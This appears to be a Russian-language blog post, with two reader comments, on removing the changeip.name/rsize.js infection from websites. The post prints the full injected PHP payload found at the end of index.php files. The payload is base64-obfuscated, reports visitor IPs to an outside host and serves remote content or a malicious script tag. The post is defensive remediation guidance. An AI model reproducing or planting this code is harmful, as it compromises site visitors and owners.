Как удалить вирус changeip.name/rsize.js с сайта

Если антивирусные программы ругаются на ваш сайт, выдают сообщение «Сайт может угрожать вашему компьютеру» и упоминают changeip.name/rsize.js, то вы попали по адресу. Сегодня будем лечить сайты от подобной заразы. В моём случае попросили посмотреть зараженный сайт, который подтягивал JavaScript расположенный по адресу changeip.changeip.name/rsize.js, но как показала практика, могут быть и другие варианты: newdomme.changeip.name/rsize.js, feelthesame.changeip.name/rsize.js, kinoshkaxa.changeip.name/rsize.js или newdom.changeip.name/rsize.js

Как выяснилось, чаще всего страдают пользователи сайтов, которые используют joomla. Есть еще одна беда в виде FileZilla. Не уверен, что официальная версия встраивает вирусы. Скорее всего версия, которая подправлена злоумышленниками, распространяемая в интернете, как самая последняя и «проверенная» всеми антивирусами. В общем, надо быть внимательным при скачивании софта из интернета.

Вернемся к удалению заразы с сайта. Как я уже говорил, у моего клиента возникла проблема с появлением сообщения о том, что сайт заражен и упоминанием changeip.changeip.name/rsize.js. На сайте не использовалось специфического движка и понять где искать вредоносный код не составила труда. Заражению были подвержены все index.php сайта.

Следующий код добавлялся в самый конец файла:

<? function sql2_safe($in) {
 $rtn = base64_decode($in);
 return $rtn;
}
function collectnewss() {

 if (!isset($_COOKIE["iJijkdaMnerys"])) {
 $value = 'yadeor';
 $ip = $_SERVER['REMOTE_ADDR'];
 $get = sql2_safe("aHR0cDovL3h4eHBvcm5vLnh4dXouY29tOjg4OC9tb3ZlLnBocD9pcD0=").$ip;
 $file = @fopen ($get, "r");
 $content = @fread($file, 1000);
 @setcookie("iJijkdaMnerys", $value, time()+3600*24);
 if (!$content)
 echo sql2_safe("PHNjcmlwdCBzcmM9Imh0dHA6Ly9jaGFuZ2VpcC5jaGFuZ2VpcC5uYW1lL3JzaXplLmpzIj48L3NjcmlwdD4=");
 else 
 echo $content;

 }
}
collectnewss ();
?>

Удалил его, порекомендовал сменить ftp-клиент, пароль на доступ и проверить свой компьютер на вирусы. Если вы сталкнулись с подобной проблемой, но не получается её победить, то задавайте вопросы и я постараюсь вам помочь.

2 комментария

  1. Сейчас мучаюсь с этим же вирусом. Движок WP, но в файлах темы нет кода. Где его еще можно найти?

  2. Еще стоит посмотреть во всех файлах с именем index.php. Обычно вирус внедряется в конец файла. Попробуйте воспользоваться поиском по файлам.

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *